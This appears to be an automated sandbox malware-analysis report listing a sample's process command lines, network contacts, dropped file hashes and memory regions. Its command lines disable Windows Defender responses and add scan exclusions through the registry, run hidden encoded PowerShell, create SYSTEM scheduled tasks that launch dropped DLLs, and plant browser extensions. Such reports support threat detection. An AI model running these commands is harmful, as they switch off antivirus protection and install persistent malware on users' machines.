C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gPeTzpkvU" /SC once /ST 04:11:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gPeTzpkvU"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gPeTzpkvU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 02:44:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe\" Ci /OUsite_idPoC 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe Ci /OUsite_idPoC 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\ihclmox.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 02:58:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll\",#1 /eesite_idjzI 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll",#1 /eesite_idjzI 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 202.184.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.240.147.44:80 api2.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe

MD5 179fb197a3d7311375c9037091fc224c
SHA1 802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256 ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512 c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317

memory/3880-4-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/3880-5-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/2612-8-0x0000000004BE0000-0x0000000004C16000-memory.dmp

memory/2612-10-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

memory/2612-9-0x0000000073410000-0x0000000073BC0000-memory.dmp

memory/2612-11-0x0000000005300000-0x0000000005928000-memory.dmp

memory/2612-12-0x00000000051C0000-0x00000000051E2000-memory.dmp

memory/2612-13-0x0000000005AA0000-0x0000000005B06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5ofvfnf.qsp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2612-23-0x0000000005C80000-0x0000000005CE6000-memory.dmp

memory/2612-24-0x0000000005CF0000-0x0000000006044000-memory.dmp

memory/2612-25-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/2612-26-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/2612-29-0x0000000073410000-0x0000000073BC0000-memory.dmp

memory/3880-33-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/4636-35-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/4636-36-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/2120-39-0x00000000733E0000-0x0000000073B90000-memory.dmp

memory/2120-40-0x00000000013B0000-0x00000000013C0000-memory.dmp

memory/2120-41-0x00000000013B0000-0x00000000013C0000-memory.dmp

memory/2120-42-0x0000000004690000-0x00000000049E4000-memory.dmp

memory/2120-52-0x00000000051E0000-0x000000000522C000-memory.dmp

memory/2120-55-0x00000000733E0000-0x0000000073B90000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/952-58-0x00000000033F0000-0x0000000003400000-memory.dmp

memory/952-57-0x00000000733E0000-0x0000000073B90000-memory.dmp

memory/952-59-0x00000000033F0000-0x0000000003400000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1c455e22616fb740376e8b8d5ec32818
SHA1 ccc3176f03dd9fe4d90b78068f340d6f871bea78
SHA256 09b3a41aec2fefabe843848e9cf23ac127a5102e4c261ea1c7490006888faf86
SHA512 007cfb87803b7b79e0d6bd05508b48fcf98e5ba2e57e40c33068069ce60402c05b80c58e3b85d2af2df333caa50f060965c7d551e39348ca426059ee4967079b

memory/952-71-0x00000000733E0000-0x0000000073B90000-memory.dmp

memory/3092-77-0x000001ED1A010000-0x000001ED1A020000-memory.dmp

memory/3092-76-0x000001ED7FF60000-0x000001ED7FF82000-memory.dmp

memory/3092-75-0x000001ED1A010000-0x000001ED1A020000-memory.dmp

memory/3092-74-0x00007FFAFD510000-0x00007FFAFDFD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4cacababa12ce908231a4e9d5a9cd3e4
SHA1 e536762af5abf4face0ee3083f23c9431c4418c4
SHA256 6a9a8dcae0e37ab806bb5ef429feec1795210badb0217adf62055b534c252be0
SHA512 fbc709421f35210881591ab56cda3038055df80aa7703a9a7e6b26e246c01306aefcb9d6b0056710c5f895cb8ed041060d40e267203250ec80d8e1ba0fc90078

memory/3092-90-0x00007FFAFD510000-0x00007FFAFDFD1000-memory.dmp

memory/4636-91-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/2312-96-0x00000000002B0000-0x000000000096A000-memory.dmp

memory/4636-97-0x0000000000740000-0x0000000000DFA000-memory.dmp

memory/2312-98-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/2312-109-0x0000000002320000-0x00000000023A5000-memory.dmp

memory/2288-110-0x00000000733E0000-0x0000000073B90000-memory.dmp

memory/2288-115-0x0000000003710000-0x0000000003720000-memory.dmp

memory/2288-113-0x0000000003710000-0x0000000003720000-memory.dmp

memory/2288-133-0x0000000004480000-0x00000000047D4000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b0aba6279662af61c28878cd8870e0b
SHA1 9b3054be4ac73bc1e3092ccc5b9250dddaa16fe5
SHA256 a86f7a800f3fe0a0af7c3b23bf7c29baf810e833950b630b42902d25dfac89df
SHA512 e86f5dae451727c4fc8d1ab75e0ec893bc32f6305afc96af75a1ed5783cd9c3f0156479db6cc0e96cbac60fd10da40793d766c50183ee05113d50e8c9318f12c

memory/2288-147-0x0000000004A10000-0x0000000004A5C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 2c0871329d9fc6fbfd631fd60b9181fb
SHA1 7f452ab3b7dddbec15083aad00e4cda16d088f01
SHA256 b79d3124ceb171fd94bc4d673230b86899889f3d775aff998f5e514379a50122
SHA512 25037191c57d1309d9b761c4159f12a216d715d439a74ab8c8f363be1c55d8ec78f83c6e53bea2d07d041847001a77087c7904d0983b9351d406a98d569ffd26

memory/2288-158-0x00000000733E0000-0x0000000073B90000-memory.dmp

memory/2312-168-0x0000000002A70000-0x0000000002AD9000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
